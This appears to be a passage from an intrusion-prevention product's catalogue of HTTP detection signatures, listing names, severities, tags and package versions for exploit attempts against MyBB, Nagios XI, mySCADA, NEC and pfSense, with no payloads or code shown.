HTTP_CRL-MyBB-Domecode-Function-Remote-Php-Code-Execution

About this situation: Detects PHP code execution exploits against MyBB
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, MyBB, CVE2006, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-70-1314
Last changed: sgpkg-ips-1607-5242
Vulnerability: HTTP-MyBB-Domecode-Function-Php-Code-Execution
Description:
Back to top

HTTP_CRL-mySCADA-myPRO-CVE-2023-28400-Command-Injection

About this situation: An attempt to exploit a vulnerability in mySCADA myPRO detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, mySCADA myPRO, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1596-5242
Last changed: sgpkg-ips-1596-5242
Vulnerability: mySCADA-myPRO-CVE-2023-28400-Command-Injection
Description:
Back to top

HTTP_CRL-mySCADA-myPRO-Datafromviewscripts-Command-Injection

About this situation: An attempt to exploit a vulnerability in mySCADA myPRO detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, mySCADA myPRO, CVE2022, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1508-5242
Last changed: sgpkg-ips-1508-5242
Vulnerability: mySCADA-myPRO-Datafromviewscripts-Command-Injection
Description:
Back to top

HTTP_CRL-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow

About this situation: Detects buffer overflow attacks against MySQL's WebDBM Webtool
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, x86, MaxDB, CVE2006, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-418-4219
Last changed: sgpkg-ips-513-5211
Vulnerability: HTTP-MySQL-MaxDB-Webtool-WebDBM-Database-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Nagios-Command-Execution

About this situation: An attempt to exploit a Nagios Command Execution vulnerability detected.
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Nagios, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-725-5211
Last changed: sgpkg-ips-926-5242
Vulnerability: Nagios-Command-Execution
Description:
Back to top

HTTP_CRL-Nagios-Core-Config-Manager-Tfpassword-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Core Config Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-553-5211
Last changed: sgpkg-ips-553-5211
Vulnerability: Nagios-Core-Config-Manager-Tfpassword-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-History.cgi-Parameter-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios, CVE2012, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-503-5211
Last changed: sgpkg-ips-503-5211
Vulnerability: Nagios-History.cgi-Parameter-Buffer-Overflow
Description:
Back to top

HTTP_CRL-Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Log Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Enterprises Log Server, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1377-5242
Last changed: sgpkg-ips-1377-5242
Vulnerability: Nagios-Log-Server-Audit-Log-And-Alert-History-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Log Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Enterprises Log Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1303-5242
Last changed: sgpkg-ips-1303-5242
Vulnerability: Nagios-Log-Server-Create_Snapshot-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Log Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Enterprises Log Server, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1309-5242
Last changed: sgpkg-ips-1309-5242
Vulnerability: Nagios-Log-Server-Mail-Settings-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Log Server detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios Enterprises Log Server, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1272-5242
Vulnerability: Nagios-Log-Server-User-Profile-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-Network-Analyzer-Report-Generator-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Network Analyzer detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Nagios, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-818-5242
Last changed: sgpkg-ips-1343-5242
Vulnerability: Nagios-Network-Analyzer-Report-Generator-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-Statuswml-Cgi-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Nagios, CVE2009, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-766-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Nagios-Statuswml-Cgi-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1364-5242
Vulnerability: Nagios-XI-Account-Email-Address-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Account-Main-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1275-5242
Vulnerability: Nagios-XI-Account-Main-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1297-5242
Last changed: sgpkg-ips-1297-5242
Vulnerability: Nagios-XI-Ajaxhelper.php-Cmdsubsys-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931-CVE-2023-40933

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1812-5242
Last changed: sgpkg-ips-1812-5242
Vulnerability: Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40931
Nagios-XI-Announcement-Banner-SQL-Injection-CVE-2023-40933
Description:
Back to top

HTTP_CRL-Nagios-XI-API-Key-Regeneration-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Potential Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1123-5242
Last changed: sgpkg-ips-1123-5242
Vulnerability: Nagios-XI-API-Key-Regeneration-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Nagios-XI-Autodiscovery-Arbitrary-Command-Execution

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-512-5211
Last changed: sgpkg-ips-512-5211
Vulnerability: Nagios-XI-Autodiscovery-Arbitrary-Command-Execution
Description:
Back to top

HTTP_CRL-Nagios-XI-Autodiscovery-Job-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1163-5242
Last changed: sgpkg-ips-1163-5242
Vulnerability: Nagios-XI-Autodiscovery-Job-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Autodiscovery-WebShell-Upload

About this situation: An attempt to exploit a vulnerability in Nagios XI detected.
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1437-5242
Last changed: sgpkg-ips-1437-5242
Vulnerability: Nagios-XI-Autodiscovery-WebShell-Upload
Description:
Back to top

HTTP_CRL-Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1311-5242
Last changed: sgpkg-ips-1314-5242
Vulnerability: Nagios-XI-Autodiscovery_Component_Update_Cron-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1386-5242
Last changed: sgpkg-ips-1386-5242
Vulnerability: Nagios-XI-Bulk-Modification-Tool-Bulkmodifications.inc.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite

About this situation: An attempt to exploit a vulnerability in Nagios XI CCM detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Nagios XI, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1292-5242
Last changed: sgpkg-ips-1292-5242
Vulnerability: Nagios-XI-CCM-Admin_views.inc.php-Arbitrary-File-Overwrite
Description:
Back to top

HTTP_CRL-Nagios-XI-Cmdsubsys-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1119-5242
Vulnerability: Nagios-XI-Cmdsubsys-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Command_test.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1276-5242
Last changed: sgpkg-ips-1774-5242
Vulnerability: Nagios-XI-Command_test.php-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Configwizards-Multiple-Command-Injections

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1340-5242
Last changed: sgpkg-ips-1357-5242
Vulnerability: Nagios-XI-Configwizards-Multiple-Command-Injections
Description:
Back to top

HTTP_CRL-Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1333-5242
Last changed: sgpkg-ips-1333-5242
Vulnerability: Nagios-XI-Configwizards-Windowswmi.inc.php-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1361-5242
Last changed: sgpkg-ips-1361-5242
Vulnerability: Nagios-XI-Custom-Includes-Manage.php-Rename_File-Directory-Traversal
Description:
Back to top

HTTP_CRL-Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1704-5242
Last changed: sgpkg-ips-1704-5242
Vulnerability: Nagios-XI-CVE-2023-48085-Command_test.php-Directory-Traversal
Description:
Back to top

HTTP_CRL-Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1329-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Nagios-XI-Deploy-Dashboards-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Helpedit.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1074-5242
Last changed: sgpkg-ips-1074-5242
Vulnerability: Nagios-XI-Helpedit.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-historytab_content.php-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Unix, Linux, Any Hardware, Nagios XI, Unix not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Vulnerability: Nagios-XI-historytab_content.php-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 10
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-771-5211
Last changed: sgpkg-ips-1013-5242
Vulnerability: Nagios-XI-Incident-Manager-Integration-Component-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1391-5242
Last changed: sgpkg-ips-1731-5242
Vulnerability: Nagios-XI-Manage-My-Dashboards-Page-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Mibs.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1295-5242
Last changed: sgpkg-ips-1295-5242
Vulnerability: Nagios-XI-Mibs.php-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1220-5242
Vulnerability: Nagios-XI-Nocscreenapi.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Privilege-Escalation

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Nagios-XI-Privilege-Escalation
Description:
Back to top

HTTP_CRL-Nagios-XI-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2018, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1112-5242
Last changed: sgpkg-ips-1112-5242
Vulnerability: Nagios-XI-Remote-Code-Execution
Description:
Back to top

HTTP_CRL-Nagios-XI-SNMP-Trap-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1298-5242
Last changed: sgpkg-ips-1298-5242
Vulnerability: Nagios-XI-SNMP-Trap-SQL-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-Two-Reflected-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1243-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Nagios-XI-Two-Reflected-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1281-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: Nagios-XI-Users.php-Do_Update_User-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Vulnerability: Nagios-XI-Users.php-Username-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1250-5242
Last changed: sgpkg-ips-1250-5242
Vulnerability: Nagios-XI-utils-rrdexport.inc.php-Get_RRD_Data-Command-Injection
Description:
Back to top

HTTP_CRL-Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Linux, Any Hardware, Nagios XI, CVE2020, Windows not specific, Linux not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1289-5242
Last changed: sgpkg-ips-1289-5242
Vulnerability: Nagios-XI-visFunctions.inc.php-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises Nagios XI detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nagios XI, CVE2021, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1381-5242
Last changed: sgpkg-ips-1381-5242
Vulnerability: Nagios-XI-Watchguard-Wizard-Watchguard-Command-Injection
Description:
Back to top

HTTP_CRL-NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Nagios Enterprises NagiosQL detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NagiosQL, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-1638-5242
Vulnerability: NagiosQL-Txtsearch-Parameter-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Nas4Free-Remote-Command-Execution

About this situation: Nas4Free Remote Command Execution detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, Nas4Free, CVE2013, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-572-5211
Last changed: sgpkg-ips-695-5211
Vulnerability: Nas4Free-Remote-Command-Execution
Description:
Back to top

HTTP_CRL-NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in NEC ESMPRO Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NEC ESMPRO Manager, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1267-5242
Vulnerability: NEC-Esmpro-Manager-Geteualogdownloadaction-Directory-Traversal
Description:
Back to top

HTTP_CRL-NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection

About this situation: An attempt to exploit a vulnerability in NEC EXPRESSCLUSTER X detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NEC EXPRESSCLUSTER X, CVE2020, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1758-5242
Vulnerability: NEC-Expresscluster-Applyconfig-XML-External-Entity-Injection
Description:
Back to top

HTTP_CRL-Nerbian-RAT-C2-Traffic

About this situation: Nerbian RAT command and control traffic was detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1468-5242
Last changed: sgpkg-ips-1468-5242
Vulnerability: Nerbian-RAT-C2-Traffic
Description:
Back to top

HTTP_CRL-Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution

About this situation: An attempt to exploit a vulnerability in NetGain Systems Enterprise Manager detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, NetGain Systems Enterprise Manager, CVE2017, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1035-5242
Last changed: sgpkg-ips-1035-5242
Vulnerability: Netgain-Systems-Enterprise-Manager-Exec_Jsp-Command-Execution
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2019, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1172-5242
Last changed: sgpkg-ips-1172-5242
Vulnerability: Netgate-Pfsense-Acme-Acme_accountkeys_Edit.php-Stored-Cross-Site-Scripting
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Command-Injection-CVE-2023-42326

About this situation: An attempt to exploit a vulnerability in PfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
Tags: Any Operating System, Any Hardware, PfSense, CVE2023, Any Operating System not specific, Suspected Compromise, HTTP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1665-5242
Last changed: sgpkg-ips-1822-5242
Vulnerability: Netgate-Pfsense-Command-Injection-CVE-2023-42326
Description:
Back to top

HTTP_CRL-Netgate-Pfsense-Cross-Site-Scripting-CVE-2023-42325

About this situation: An attempt to exploit a vulnerability in Netgate pfSense detected
Context: HTTP Normalized Request-Line
Severity: 7
